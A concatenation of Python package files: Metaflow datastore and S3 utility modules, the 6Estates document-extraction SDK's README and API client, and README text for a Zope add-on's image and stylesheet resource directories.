path = self.get_log_location(logtype, attempt_override)
return self._get_s3_object(path)
@only_if_not_done
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
self._put_s3_object(path, b'')
self.metadata.register_metadata(
self.run_id, self.step_name, self.task_id,
[MetaDatum(field='attempt-done', value=str(self.attempt), type='attempt-done')])
self._is_done_set = True
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
        successfully with done().
"""
filename = self.get_done_filename_for_attempt(self.attempt)
path = os.path.join(self.root, filename)
        return bool(self._head_s3_object(path))

# --- package: 6D657461666C6F77-0.0.17 | file: metaflow/datastore/s3.py ---
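Aside: a hedged standalone sketch of the existence probe that
_head_s3_object above performs with boto3; a HEAD request either returns the
object's metadata or raises a ClientError whose 404 code means the key is
absent. The function name is illustrative.

import boto3
from botocore.exceptions import ClientError

def s3_object_exists(bucket, key):
    s3 = boto3.client('s3')
    try:
        s3.head_object(Bucket=bucket, Key=key)
        return True
    except ClientError as err:
        if int(err.response['Error']['Code']) == 404:
            return False
        raise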
"""
MetaflowDatastoreSet allows you to prefetch multiple (read) datastores into a
cache and lets you access them.
As a performance optimization it also lets you prefetch select data artifacts
leveraging a shared cache.
"""
import json
class MetaflowDatastoreSet(object):
def __init__(self,
ds_class,
flow_name,
run_id,
steps=None,
pathspecs=None,
metadata=None,
event_logger=None,
monitor=None,
prefetch_data_artifacts=None):
data_blobs = ds_class.get_latest_tasks(flow_name,
run_id,
steps=steps,
pathspecs=pathspecs)
artifact_cache = {}
datastores = [ds_class(flow_name,
run_id=run_id,
step_name=step_name,
task_id=task_id,
metadata=metadata,
attempt=attempt,
event_logger=event_logger,
monitor=monitor,
data_obj=json.loads(data_blob),
artifact_cache=artifact_cache)
for step_name, task_id, attempt, data_blob in data_blobs]
if prefetch_data_artifacts:
artifacts_to_prefetch = set(
[ds.artifact_path(artifact_name)
for ds in datastores
for artifact_name in prefetch_data_artifacts
if artifact_name in ds])
# Update (and not re-assign) the artifact_cache since each datastore
# created above has a reference to this object.
artifact_cache.update(ds_class.get_artifacts(artifacts_to_prefetch))
self.pathspec_index_cache = {}
self.pathspec_cache = {}
for ds in datastores:
self.pathspec_index_cache[ds.pathspec_index] = ds
self.pathspec_cache[ds.pathspec] = ds
def get_with_pathspec(self, pathspec):
return self.pathspec_cache.get(pathspec, None)
def get_with_pathspec_index(self, pathspec_index):
return self.pathspec_index_cache.get(pathspec_index, None)
def __iter__(self):
for v in self.pathspec_cache.values():
            yield v

# --- package: 6D657461666C6F77-0.0.17 | file: metaflow/datastore/datastore_set.py ---
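Aside: a hedged usage sketch for MetaflowDatastoreSet above. The flow name,
run id and artifact name are illustrative, and metadata_provider stands for
a configured MetadataProvider instance, so the sketch is left commented out.

# ds_set = MetaflowDatastoreSet(
#     S3DataStore, 'MyFlow', '1234',
#     metadata=metadata_provider,
#     prefetch_data_artifacts=['model'])
# Look up one task by pathspec, or walk all of them via iteration:
# ds = ds_set.get_with_pathspec('1234/train/42')
# for ds in ds_set:
#     print(ds.pathspec, ds.get('model'))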
import gzip
import os
import sys
import time
from hashlib import sha1
from functools import partial
try:
    # Python 3.3+; collections.Sequence was removed in Python 3.10
    from collections.abc import Sequence
except ImportError:
    # Python 2
    from collections import Sequence
try:
# Python 2
import cPickle as pickle
except:
# Python 3
import pickle
from types import MethodType, FunctionType
from ..includefile import InternalFile
from ..parameters import Parameter
from ..exception import MetaflowException, MetaflowInternalError
from ..metadata import DataArtifact
from .. import metaflow_config
class DataException(MetaflowException):
headline = "Data store error"
class Inputs(object):
"""
split-and: inputs.step_a.x inputs.step_b.x
foreach: inputs[0].x
both: (inp.x for inp in inputs)
"""
def __init__(self, flows):
# TODO sort by foreach index
self.flows = list(flows)
for flow in self.flows:
setattr(self, flow._current_step, flow)
def __getitem__(self, idx):
return self.flows[idx]
def __iter__(self):
return iter(self.flows)
def only_if_not_done(f):
def method(self, *args, **kwargs):
if self._is_done_set:
raise MetaflowInternalError("Tried to write to datastore "\
"(method %s) after it was marked "\
".done()" % f.func_name)
return f(self, *args, **kwargs)
return method
class TransformableObject(object):
# Very simple wrapper class to only keep one transform
# of an object. This is to force garbage collection
# on the transformed object if the transformation is
# successful
def __init__(self, current_object):
self._object = current_object
self._original_type = type(self._object)
    def transform(self, transformer):
        # Transformer is a function taking one argument (the current object)
        # and returning another object which replaces the current object;
        # if the transformer raises, the current object is left unchanged.
        self._object = transformer(self._object)
def current(self):
return self._object
def current_type(self):
return type(self._object)
def original_type(self):
return self._original_type
class MetaflowDataStore(object):
datastore_root = None
# Datastore needs to implement the methods below
def save_metadata(self, name, data):
"""
Save a task-specific metadata dictionary as JSON.
"""
raise NotImplementedError()
def load_metadata(self, name):
"""
Load a task-specific metadata dictionary as JSON.
"""
raise NotImplementedError()
def has_metadata(self, name):
"""
Return True if this metadata file exists.
"""
raise NotImplementedError()
def save_data(self, sha, transformable_object):
"""
Save a content-addressed data blob if it doesn't exist already.
"""
raise NotImplementedError()
def load_data(self, sha):
"""
Load a content-addressed data blob.
"""
raise NotImplementedError()
def save_log(self, logtype, bytebuffer):
"""
Save a log file represented as a bytes object.
Returns path to log file.
"""
raise NotImplementedError()
def load_log(self, logtype, attempt_override=None):
"""
Load a task-specific log file represented as a bytes object.
"""
raise NotImplementedError()
def done(self):
"""
Write a marker indicating that datastore has finished writing to
this path.
"""
raise NotImplementedError()
def is_done(self):
"""
A flag indicating whether this datastore directory was closed
        successfully with done().
"""
raise NotImplementedError()
def object_path(self, sha):
"""
Return URL of an object identified by a sha.
"""
raise NotImplementedError()
@classmethod
def get_latest_tasks(cls,
flow_name,
run_id=None,
steps=None,
pathspecs=None):
"""
Return a list of (step, task, attempt, metadata_blob) for a subset of
the tasks (consider eventual consistency) for which the latest attempt
is done for the input `flow_name, run_id`.
We filter the list based on `steps` if non-None.
Alternatively, `pathspecs` can contain the exact list of pathspec(s)
(run_id/step_name/task_id) that should be filtered.
Note: When `pathspecs` is specified, we expect strict consistency and
not eventual consistency in contrast to other modes.
"""
raise NotImplementedError()
@classmethod
def get_artifacts(cls, artifacts_to_prefetch):
"""
Return a list of (sha, obj_blob) for all the object_path(s) specified in
`artifacts_to_prefetch`.
"""
raise NotImplementedError()
def artifact_path(self, artifact_name):
"""
Return the object_path() for `artifact_name`.
Pre-condition: `artifact_name` is in datastore.
"""
if self.objects:
return self.object_path(self.objects[artifact_name])
return None
def get_log_location(self, logtype, attempt_override=None):
"""
Returns a string indicating the location of the log of the specified type.
"""
filename = self.filename_with_attempt_prefix(
'%s.log' % logtype, attempt_override if attempt_override is not None else self.attempt)
return os.path.join(self.root, filename)
@classmethod
def get_datastore_root_from_config(cls, echo, create_on_absent=True):
"""
Returns a default choice for datastore_root from metaflow_config
depending on the datastore type.
"""
return getattr(metaflow_config,
'DATASTORE_SYSROOT_%s' % cls.TYPE.upper())
@classmethod
def decode_gzip_data(cls, filename, fileobj=None):
"""
Returns the gzip data in file with `filename` or passed via `fileobj`.
"""
with gzip.GzipFile(filename, fileobj=fileobj, mode='rb') as f:
return f.read()
@classmethod
def make_path(cls,
flow_name,
run_id=None,
step_name=None,
task_id=None,
pathspec=None):
"""
Return the path for a given flow using this datastore.
path = cls.datastore_root/flow_name/run_id/step_name/task_id
Callers are expected to invoke this function with a sequence of non-None
values depending on the nested path they want.
For example,
If run_id is None, return path = cls.datastore_root/flow_name
If step_name is None, return path = cls.datastore_root/flow_name/run_id
and so on.
If pathspec is non None,
return path = cls.datastore_root/flow_name/pathspec
"""
sysroot = cls.datastore_root
if pathspec:
return os.path.join(sysroot, flow_name, pathspec)
elif flow_name is None:
return sysroot
elif run_id is None:
return os.path.join(sysroot, flow_name)
elif step_name is None:
return os.path.join(sysroot, flow_name, run_id)
elif task_id is None:
return os.path.join(sysroot, flow_name, run_id, step_name)
else:
return os.path.join(sysroot, flow_name, run_id, step_name, task_id)
@classmethod
def filename_with_attempt_prefix(cls, name, attempt):
"""
Return the equivalent filename for `name` depending
whether an attempt prefix must be used, if `attempt` isn't None.
"""
if attempt is None:
return name
else:
return '%d.%s' % (attempt, name)
@classmethod
def get_metadata_filename_for_attempt(cls, attempt):
"""
Return the metadata filename (.data.json) based on `attempt`.
"""
return cls.filename_with_attempt_prefix('data.json', attempt)
@classmethod
def is_metadata_filename(cls, fname):
"""
Returns if the filename is a metadata filename (ends in .data.json).
"""
return fname.endswith('data.json')
@classmethod
def get_done_filename_for_attempt(cls, attempt):
"""
Returns the done filename (.DONE.lock) based on `attempt`.
"""
return cls.filename_with_attempt_prefix('DONE.lock', attempt)
@classmethod
def is_done_filename(cls, fname):
"""
Returns if the filename is a done filename (ends in .DONE.lock).
"""
return fname.endswith('DONE.lock')
@classmethod
def get_filename_for_attempt(cls, attempt):
"""
Returns the attempt filename (.attempt.json) based on `attempt`.
"""
return cls.filename_with_attempt_prefix('attempt.json', attempt)
@classmethod
def is_attempt_filename(cls, fname):
"""
Returns if the filename is an attempt filename (ends in .attempt.json).
"""
return fname.endswith('attempt.json')
@classmethod
def parse_filename(cls, fname):
"""
Parse the filename and returns (name, attempt).
When using old style paths (pre-attempt id), returns
(name=fname, attempt=None).
This is expected to be the converse to
filename_with_attempt_prefix() method.
"""
if len(fname) >= 1 and fname[0] >= '0' and fname[0] <= '9':
# new style paths = <attempt>.<name>
attempt = int(fname[0])
name = fname[2:]
else:
# old style paths.
attempt = None
name = fname
return name, attempt
def __init__(self,
flow_name,
run_id=None,
step_name=None,
task_id=None,
mode='r',
metadata=None,
attempt=None,
event_logger=None,
monitor=None,
data_obj=None,
artifact_cache=None):
if run_id == 'data':
raise DataException("Run ID 'data' is reserved. "
"Try with a different --run-id.")
if self.datastore_root is None:
raise DataException("Datastore root not found. "
"Specify with DATASTORE_SYSROOT_%s "
"environment variable." % self.TYPE.upper())
self.event_logger = event_logger
self.monitor = monitor
self.metadata = metadata
self.run_id = run_id
self.step_name = step_name
self.task_id = task_id
self._is_done_set = False
self._encodings = {'gzip+pickle-v2'}
ver = sys.version_info[0] * 10 + sys.version_info[1]
if ver >= 34:
self._encodings.add('gzip+pickle-v4')
self.artifact_cache = artifact_cache
if self.artifact_cache is None:
self.artifact_cache = {}
self.data_root = os.path.join(self.datastore_root, flow_name, 'data')
self.root = self.make_path(flow_name,
run_id,
step_name,
task_id)
self.attempt = attempt
if mode == 'w':
if run_id is not None:
# run_id may be None when datastore is used to save
# things not related to runs, e.g. the job package
self.save_metadata('attempt', {'time': time.time()})
self.objects = {}
self.info = {}
elif mode == 'r':
if data_obj is None:
# what is the latest attempt ID of this data store?
# In the case of S3, the has_metadata() below makes a
# HEAD request to a non-existent object, which results
# to this object becoming eventually consistent. This
# could result to a situation that has_metadata() misses
# the latest version although it is already existing.
# As long as nothing opens a datastore for reading before
# writing, this should not be a problem.
# We have to make MAX_ATTEMPTS HEAD requests, which is
# very unfortunate performance-wise (TODO: parallelize this).
# On Meson it is possible that some attempts are missing, so
# we have to check all possible attempt files to find the
# latest one. Compared to doing a LIST operation, these checks
# are guaranteed to be consistent as long as the task to be
# looked up has already finished.
self.attempt = None # backwards-compatibility for pre-attempts.
for i in range(0, metaflow_config.MAX_ATTEMPTS):
if self.has_metadata('%d.attempt' % i, with_attempt=False):
self.attempt = i
# was the latest attempt completed successfully?
if not self.is_done():
raise DataException("Data was not found or not finished at %s"\
% self.root)
# load the data from the latest attempt
data_obj = self.load_metadata('data')
self.origin = data_obj.get('origin')
self.objects = data_obj['objects']
self.info = data_obj.get('info', {})
elif mode == 'd':
# Direct access mode used by the client. We effectively don't load any
# objects and can only access things using the load_* functions
self.origin = None
self.objects = None
self.info = None
else:
raise DataException('Unknown datastore mode: %s' % mode)
@property
def pathspec(self):
return '%s/%s/%s' % (self.run_id, self.step_name, self.task_id)
@property
def pathspec_index(self):
idxstr = ','.join(map(str, (f.index for f in self['_foreach_stack'])))
return '%s/%s[%s]' % (self.run_id, self.step_name, idxstr)
def _save_object(self, transformable_obj, var, force_v4=False):
if force_v4:
blobtype = 'gzip+pickle-v4'
if blobtype not in self._encodings:
raise DataException("Artifact *%s* requires a serialization encoding that "
"requires Python 3.4 or newer." % var)
transformable_obj.transform(lambda x: pickle.dumps(x, protocol=4))
else:
try:
# to ensure compatibility between python2 and python3, we use the
# highest protocol that works with both the versions
transformable_obj.transform(lambda x: pickle.dumps(x, protocol=2))
blobtype = 'gzip+pickle-v2'
except (SystemError, OverflowError):
# this happens when you try to serialize an oversized
# object (2GB/4GB+)
blobtype = 'gzip+pickle-v4'
if blobtype not in self._encodings:
raise DataException("Artifact *%s* is very large (over 2GB). "
"You need to use Python 3.4 or newer if "
"you want to serialize large objects."
% var)
transformable_obj.transform(lambda x: pickle.dumps(x, protocol=4))
sha = sha1(transformable_obj.current()).hexdigest()
sz = len(transformable_obj.current())
self.save_data(sha, transformable_obj)
return sha, sz, blobtype
def _load_object(self, sha):
if sha in self.artifact_cache:
blob = self.artifact_cache[sha]
else:
blob = self.load_data(sha)
return pickle.loads(blob)
@only_if_not_done
def clone(self, origin):
self.save_metadata('data', {'datastore': self.TYPE,
'version': '0.1',
'origin': origin.pathspec,
'python_version': sys.version,
'objects': origin.objects,
'info': origin.info})
self._register_data_artifacts(origin.objects, origin.info)
@only_if_not_done
def passdown_partial(self, origin, vars):
# Pass-down from datastore origin all information related to vars to
# this datastore. In other words, this adds to the current datastore all
# the variables in vars (obviously, it does not download them or anything but
# records information about them). This is used to propagate parameters between
# datastores without actually loading the parameters
for var in vars:
sha = origin.objects.get(var)
if sha:
self.objects[var] = sha
self.info[var] = origin.info[var]
@only_if_not_done
def persist(self, flow):
def serializable_attributes():
for var in dir(flow):
if var.startswith('__') or var in flow._EPHEMERAL:
continue
# Skip over properties of the class (Parameters)
if hasattr(flow.__class__, var) and \
isinstance(getattr(flow.__class__, var), property):
continue
val = getattr(flow, var)
if isinstance(val, InternalFile):
# We will force protocol 4 for serialization for anything
# bigger than 1 GB
yield var, TransformableObject(val()), val.size() > 1024 * 1024 * 1024
continue
if not (isinstance(val, MethodType) or
isinstance(val, FunctionType) or
isinstance(val, Parameter)):
yield var, TransformableObject(val), False
# initialize with old values...
if flow._datastore:
self.objects.update(flow._datastore.objects)
self.info.update(flow._datastore.info)
# ...overwrite with new
for var, obj, force_v4 in serializable_attributes():
sha, size, encoding = self._save_object(obj, var, force_v4)
self.objects[var] = sha
self.info[var] = {'size': size,
'type': str(obj.original_type()),
'encoding': encoding}
self.save_metadata('data', {'datastore': self.TYPE,
'version': '1.0',
'attempt': self.attempt,
'python_version': sys.version,
'objects': self.objects,
'info': self.info})
self._register_data_artifacts(self.objects, self.info)
def _register_data_artifacts(self, objects, info):
# register artifacts with the metadata service
artifacts = [DataArtifact(name=var,
ds_type=self.TYPE,
url=self.object_path(sha),
sha=sha,
type=info[var]['encoding'])
for var, sha in objects.items()]
self.metadata.register_data_artifacts(self.run_id,
self.step_name,
self.task_id,
self.attempt,
artifacts)
def get(self, var, default=None):
if self.objects:
return self[var] if var in self.objects else default
return default
# Provides a fast-path to check if a given object is None.
def is_none(self, var):
if not self.info:
return True
info = self.info.get(var)
if info:
obj_type = info.get('type')
# Conservatively check if the actual object is None, in case
# the artifact is stored using a different python version.
if obj_type == str(type(None)):
return True
# Slow path since this has to get the object from S3.
return self.get(var) is None
def __contains__(self, var):
if self.objects:
return var in self.objects
return False
def __getitem__(self, var):
# backwards compatibility: we might not have info for all objects
if not self.info:
return None
info = self.info.get(var)
if info:
encoding = info.get('encoding', 'gzip+pickle-v2')
else:
encoding = 'gzip+pickle-v2'
if encoding in self._encodings:
return self._load_object(self.objects[var])
raise DataException("Artifact *%s* requires a newer version "
"of Python. Try with Python 3.4 or newer." %
var)
def __iter__(self):
if self.objects:
return iter(self.objects)
return iter([])
def __str__(self):
return self.format(show_private=True, max_value_size=1000)
def items(self):
if self.objects:
return self.objects.items()
return {}
def to_dict(self, show_private=False, max_value_size=None, include=None):
d = {}
for k, v in self.items():
if include and k not in include:
continue
if k[0] == '_' and not show_private:
continue
if max_value_size is not None and\
self.info[k]['size'] > max_value_size:
d[k] = ArtifactTooLarge()
else:
d[k] = self[k]
return d
def format(self, **kwargs):
def lines():
for k, v in self.to_dict(**kwargs).items():
yield k, '*{key}* [size: {size} type: {type}] = {value}'\
.format(key=k, value=v, **self.info[k])
return '\n'.join(line for k, line in sorted(lines()))
class ArtifactTooLarge(object):
def __str__(self):
        return '< artifact too large >'

# --- package: 6D657461666C6F77-0.0.17 | file: metaflow/datastore/datastore.py ---
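Aside: a standalone sketch of the protocol fallback that _save_object above
applies; protocol 2 keeps artifacts readable from Python 2, and protocol 4
is the escape hatch for objects over the 2GB/4GB limits that make protocol 2
raise. The function name is illustrative.

import pickle

def dumps_compat(obj):
    try:
        # Highest protocol readable by both Python 2 and Python 3.
        return pickle.dumps(obj, protocol=2), 'gzip+pickle-v2'
    except (SystemError, OverflowError):
        # Oversized payload: fall back to protocol 4 (Python 3.4+).
        return pickle.dumps(obj, protocol=4), 'gzip+pickle-v4'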
from .s3util import aws_retry, get_s3_client
try:
# python2
from urlparse import urlparse
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
from urllib.parse import urlparse
import io
BytesIO = io.BytesIO
class S3Tail(object):
def __init__(self, s3url):
url = urlparse(s3url)
self.s3, self.ClientError = get_s3_client()
self._bucket = url.netloc
self._key = url.path.lstrip('/')
self._pos = 0
self._tail = b''
@property
def bytes_read(self):
return self._pos
@property
def tail(self):
return self._tail
def __iter__(self):
while True:
buf = self._fill_buf()
if buf is None:
yield b''
else:
for line in buf:
if line.endswith(b'\n'):
yield line
else:
self._tail = line
break
@aws_retry
def _make_range_request(self):
try:
return self.s3.get_object(Bucket=self._bucket,
Key=self._key,
Range='bytes=%d-' % self._pos)
except self.ClientError as err:
code = err.response['Error']['Code']
# NOTE we deliberately regard NoSuchKey as an ignorable error.
# We assume that the file just hasn't appeared in S3 yet.
if code in ('InvalidRange', 'NoSuchKey'):
return None
else:
raise
def _fill_buf(self):
resp = self._make_range_request()
if resp is None:
return None
code = str(resp['ResponseMetadata']['HTTPStatusCode'])
if code[0] == '2':
data = resp['Body'].read()
if data:
buf = BytesIO(self._tail + data)
self._pos += len(data)
self._tail = b''
return buf
else:
return None
elif code[0] == '5':
return None
else:
            raise Exception('Retrieving %s/%s failed: %s'
                            % (self._bucket, self._key, code))

# --- package: 6D657461666C6F77-0.0.17 | file: metaflow/datastore/util/s3tail.py ---
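Aside: a hedged usage sketch for S3Tail above. Iteration yields b'' when no
new bytes are available and buffers a trailing partial line internally, so a
poller sleeps between passes; the URL is illustrative, hence the sketch is
left commented out.

# import time
# tail = S3Tail('s3://my-bucket/MyFlow/1234/train/42/0.stdout.log')
# while True:
#     for line in tail:
#         if not line:
#             break
#         print(line.decode('utf-8', errors='replace'), end='')
#     time.sleep(1)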
6Estates idp-python
===================
A Python SDK for communicating with the 6Estates Intelligent Document Processing (IDP) Platform.
Documentation
-----------------
The documentation for the 6Estates IDP API can be found via https://idp-sea.6estates.com/docs
The Python library documentation can be found via https://idp-sdk-doc.6estates.com/python/.
Setup
-----------------
.. code-block:: bash
$ pip install 6estates-idp
Usage
============
1. Initialize the 6Estates IDP Client
---------------------------------------------------------------------
6E API Access Token (Deprecated)
.. code-block:: python
from sixe_idp.api import Client, FileType
client = Client(region='sea', token='your-token-here')
6E API Authorization based on oauth 2.0
.. code-block:: python
from sixe_idp.api import Client, OauthClient, FileType
oauth = OauthClient(region='sea').get_IDP_authorization(authorization ='your-authorization-here')
client = Client(region='sea', token=oauth, isOauth=True)
2. To Extract Fields in a Synchronous Way
---------------------------------------------------------------------
If you just need to do one file at a time
.. code-block:: python
from sixe_idp.api import Client, FileType
client = Client(region='sea', token='your-token-here')
task_result = client.extraction_task.run_simple_task(file=open("[UOB]202103_UOB_2222.pdf","rb"), file_type=FileType.bank_statement)
3. To Extract Fields in an Asynchronous Way
--------------------------------------------------------------------
If you need to do a batch of files
.. code-block:: python
from sixe_idp.api import Client, Task, TaskResult, IDPException, FileType
client: Client = Client(region='test', token='your-token-here')
task: Task = client.extraction_task.create(file=open("path-to-the-file"), file_type=FileType.bank_statement)
task_result: TaskResult = client.extraction_task.result(task_id=task.task_id)
    while task_result.status == 'Doing' or task_result.status == 'Init':
time.sleep(3)
task_result = client.extraction_task.result(task_id=task.task_id)
print(task_result.raw)
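
When polling like this, it is prudent to bound the wait. A small helper along
these lines may help; the 300-second timeout and 3-second interval are
illustrative choices, not part of the SDK:

.. code-block:: python

    import time
    from sixe_idp.api import IDPException

    def wait_for_result(client, task_id, timeout=300, interval=3):
        deadline = time.time() + timeout
        while time.time() < deadline:
            result = client.extraction_task.result(task_id=task_id)
            if result.status not in ('Init', 'Doing'):
                return result
            time.sleep(interval)
        raise IDPException('Task %s did not finish within %s seconds' % (task_id, timeout))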
# --- package: 6estates-idp-0.1.4 | file: README.rst ---
import time
import requests
from enum import Enum
class FileType(Enum):
bank_statement = 'CBKS'
invoice = 'CINV'
cheque = 'CHQ'
credit_bureau_singapore = 'CBS'
receipt = 'RCPT'
payslip = 'PS'
packing_list = 'PL'
bill_of_lading = 'BL'
air_waybill = 'AWBL'
kartu_tanda_penduduk = 'KTP'
hong_kong_annual_return = 'HKAR'
purchase_order = 'PO'
delivery_order = 'DO'
class IDPException(Exception):
"""
An IDP processing error occurred.
"""
pass
class IDPConfigurationException(Exception):
"""
An IDP configuration error occurred.
"""
pass
class Task(object):
"""
The :class:`Task <Task>` object, which contains a server's response to an IDP task creating request.
"""
def __init__(self, raw=None):
self.raw = raw
@property
def task_id(self):
return self.raw['data']
class TaskResultField:
def __init__(self, raw) -> None:
self.raw = raw
@property
def field_code(self):
"""
see `field_code <https://idp-sea.6estates.com/docs#/types/type_desc>`_
"""
return self.raw['field_code']
@property
def field_name(self):
"""
see `field_name <https://idp-sea.6estates.com/docs#/types/type_desc>`_
"""
return self.raw['field_name']
@property
def value(self):
return self.raw['value']
@property
def type(self):
"""
see `type <https://idp-sea.6estates.com/docs#/format/format>`_
"""
return self.raw['type']
# @property
# def extraction_confidence(self):
# return self.raw['extraction_confidence']
class TaskResult(object):
def __init__(self, raw):
self.raw = raw
@property
def status(self):
"""
status of the task, which can be:
- **Init** Task is created
- **Doing** Task is being processed
        - **Done** Task result is available
- **Fail** An error occurred
- **Invalid** Invalid document
read `more <https://idp-sea.6estates.com/docs#/extract/extraction?id=_2135-response>`_
"""
return self.raw['data']['taskStatus']
@property
def fields(self):
"""
List of :class:`TaskResultField <TaskResultField>` object
"""
return [TaskResultField(x) for x in self.raw['data']['fields']]
class ExtractionTaskClient(object):
def __init__(self, token=None, region=None, isOauth=False):
"""
Initializes task extraction
:param str token: Client's token
:param str region: Region to make requests to, defaults to 'sea'
:param bool isOauth: Oauth 2.0 flag
"""
self.token = token
self.region = region
self.isOauth = isOauth
# URL to upload file and get response
if region == 'test':
region = ''
else:
region = '-'+region
self.url_post = "https://idp"+region + \
".6estates.com/customer/extraction/fields/async"
self.url_get = "https://idp"+region + \
".6estates.com/customer/extraction/field/async/result/"
def create(self, file=None, file_type=None, lang=None,
customer=None, customer_param=None, callback=None,
auto_callback=None, callback_mode=None, hitl=None) -> Task:
"""
        :param lang: Language of the document. English: EN. Default is EN.
:type lang: str
:param file: Pdf/image file. Only one file is allowed to be uploaded each time
:type file: file
:param file_type: The code of the file type (e.g., CBKS). Please see details of File Type Code.
:type file_type: FileType
:param customer: Enterprise/customer code (e.g., ABCD). a fixed value provided by 6E.
:type customer: str
        :param customer_param: Any string value specified by the enterprise/customer. This value will be returned in the callback request.
:type customer_param: str
:param callback: A http(s) link for callback after completing the task. If you need to use the callback parameter, please make sure that the callback url does not have any authentication.
:type callback: str
        :param auto_callback: The callback request will be sent automatically if autoCallback is true; otherwise, the user needs to trigger the callback manually. Default value is true.
:type auto_callback: bool
:param callback_mode: Callback mode when the task finishes.
- `mode 0`: callback request only contains the task status.
- `mode 1`: callback request contains task status and extracted field results.
- `mode 2`: callback request contains task status, extracted fields results and pdf file.
Default is 0.
:type callback_mode: int
:param hitl: Enables the Human-In-The-Loop (HITL) service. If the value is true, the submitted task will be processed by AI + HITL. Otherwise, the task will be processed by AI only.
Default value: false.
:type hitl: bool
"""
assert isinstance(file_type, FileType), "Invalid file type"
if file is None:
raise IDPException("File is required")
if self.isOauth:
headers = {"Authorization": self.token}
else:
headers = {"X-ACCESS-TOKEN": self.token}
files = {"file": file}
data = {'fileType': file_type.value, 'lang': lang, 'customer': customer,
'customerParam': customer_param, 'callback': callback,
'autoCallback': auto_callback, 'callbackMode': callback_mode,
'hitl': hitl}
        # Drop parameters the caller did not supply
        data = {key: value for key, value in data.items() if value is not None}
r = requests.post(self.url_post, headers=headers,
files=files, data=data)
if r.ok:
return Task(r.json())
raise IDPException(r.json()['message'])
def result(self, task_id=None) -> TaskResult:
"""
:param task_id: task_id
:type task_id: int
:returns: status and result of task
:rtype: :class:`TaskResult <TaskResult>`
"""
if self.isOauth:
headers = {"Authorization": self.token}
else:
headers = {"X-ACCESS-TOKEN": self.token}
r = requests.get(self.url_get+str(task_id), headers=headers)
if r.ok:
return TaskResult(r.json())
raise IDPException(r.json()['message'])
def run_simple_task(self, file=None, file_type=None, poll_interval=3, timeout=600):
"""
Run simple extraction task
:param file: Pdf/image file. Only one file is allowed to be uploaded each time
:type file: file
:param file_type: The code of the file type (e.g., CBKS). Please see details of File Type Code.
:type file_type: FileType
:param poll_interval: Interval to poll the result from api, in seconds
:type poll_interval: float
:param timeout: Timeout in seconds
:type timeout: float
"""
start = time.time()
task = self.create(file=file, file_type=file_type)
task_result = self.result(task_id=task.task_id)
        while task_result.status == 'Doing' or task_result.status == 'Init':
if time.time() - start > timeout:
raise IDPException(f'Task timeout exceeded: {timeout}')
time.sleep(poll_interval)
task_result = self.result(task_id=task.task_id)
        return task_result
class OauthClient(object):
def __init__(self, region=None):
"""
Initializes the Oauth Client
:param region: IDP Region to make requests to, e.g. 'test'
:type region: str
:returns: :class:`OauthClient <OauthClient>`
:rtype: sixe_idp.api.OauthClient
"""
if region not in ['test', 'sea']:
raise IDPConfigurationException(
"Region is required and limited in ['test','sea']")
self.region = region
if region == 'test':
region = '-onp'
else:
region = '-'+region
self.url_post = "https://oauth"+region + \
".6estates.com/oauth/token?grant_type=client_bind"
def get_IDP_authorization(self, authorization=None):
"""
:param authorization: Client's authorization
:type authorization: str
"""
if authorization is None:
raise IDPConfigurationException('Authorization is required')
self.authorization = authorization
headers = {"Authorization": self.authorization}
r = requests.post(self.url_post, headers=headers)
        if r.ok:
            data = r.json()
            if not data['data']['expired']:
                return data['data']['value']
            raise IDPException("This IDP Authorization is expired, please re-send the request to get a new IDP Authorization. " + data['message'])
        raise IDPException(r.json()['message'])
class Client(object):
def __init__(self, region=None, token=None, isOauth=False):
"""
Initializes the IDP Client
:param token: Client's token
:type token: str
        :param region: IDP Region to make requests to, e.g. 'test'
        :type region: str
        :param isOauth: OAuth 2.0 flag
        :type isOauth: bool
:returns: :class:`Client <Client>`
:rtype: sixe_idp.api.Client
"""
if token is None:
raise IDPConfigurationException('Token is required')
if region not in ['test', 'sea']:
raise IDPConfigurationException(
"Region is required and limited in ['test','sea']")
self.region = region
self.token = token
self.isOauth = isOauth
self.extraction_task = ExtractionTaskClient(token=token, region=region, isOauth=self.isOauth)
"""
An :class:`ExtractionTaskClient <ExtractionTaskClient>` object
""" | 6estates-idp | /6estates-idp-0.1.4.tar.gz/6estates-idp-0.1.4/sixe_idp/api.py | api.py |
README for the 'browser/images/' directory
==========================================
This folder is a Zope 3 Resource Directory acting as a repository for images.
Its declaration is located in 'browser/configure.zcml':
<!-- Resource directory for images -->
<browser:resourceDirectory
name="73.unlockItems.images"
directory="images"
layer=".interfaces.IThemeSpecific"
/>
An image placed in this directory (e.g. 'logo.png') can be accessed from
this relative URL:
"++resource++73.unlockItems.images/logo.png"
Note that it might be better to register each of these resources separately if
you want them to be overridable from zcml directives.
The only way to override a resource in a resource directory is to override the
entire directory (all elements have to be copied over).
A Zope 3 browser resource declared like this in 'browser/configure.zcml':
<browser:resource
name="logo.png"
file="images/logo.png"
layer=".interfaces.IThemeSpecific"
/>
can be accessed from this relative URL:
"++resource++logo.png"
Notes
-----
* Whatever the way they are declared (in bulk inside a resource directory or
as separate resources), images registered as Zope 3 browser resources don't
have all the attributes that Zope 2 image objects have (i.e. the 'title'
property and the 'tag()' and 'get_size()' methods).
This means that if you want the html tag of your image to be auto-generated
(this is the case by default for the portal logo), you should store it in a
directory that is located in the 'skins/' folder of your package, registered
as a File System Directory View in the 'portal_skins' tool, and added to the
layers of your skin.
* Customizing/overriding images that are originally accessed from the
'portal_skins' tool (e.g. Plone default logo and icons) can be done inside
that tool only. There is no known way to do it with Zope 3 browser
resources.
Vice versa, there is no known (easy) way to override a Zope 3 browser
resource from a skin layer in 'portal_skins'.
| 73.unlockItems | /73.unlockItems-0.3.tar.gz/73.unlockItems-0.3/73/unlockItems/browser/images/README.txt | README.txt |
README for the 'browser/stylesheets/' directory
===============================================
This folder is a Zope 3 Resource Directory acting as a repository for
stylesheets.
Its declaration is located in 'browser/configure.zcml':
<!-- Resource directory for stylesheets -->
<browser:resourceDirectory
name="73.unlockItems.stylesheets"
directory="stylesheets"
layer=".interfaces.IThemeSpecific"
/>
A stylesheet placed in this directory (e.g. 'main.css') can be accessed from
this relative URL:
"++resource++73.unlockItems.stylesheets/main.css"
Note that it might be better to register each of these resources separately if
you want them to be overridable from zcml directives.
The only way to override a resource in a resource directory is to override the
entire directory (all elements have to be copied over).
A Zope 3 browser resource declared like this in 'browser/configure.zcml':
<browser:resource
name="main.css"
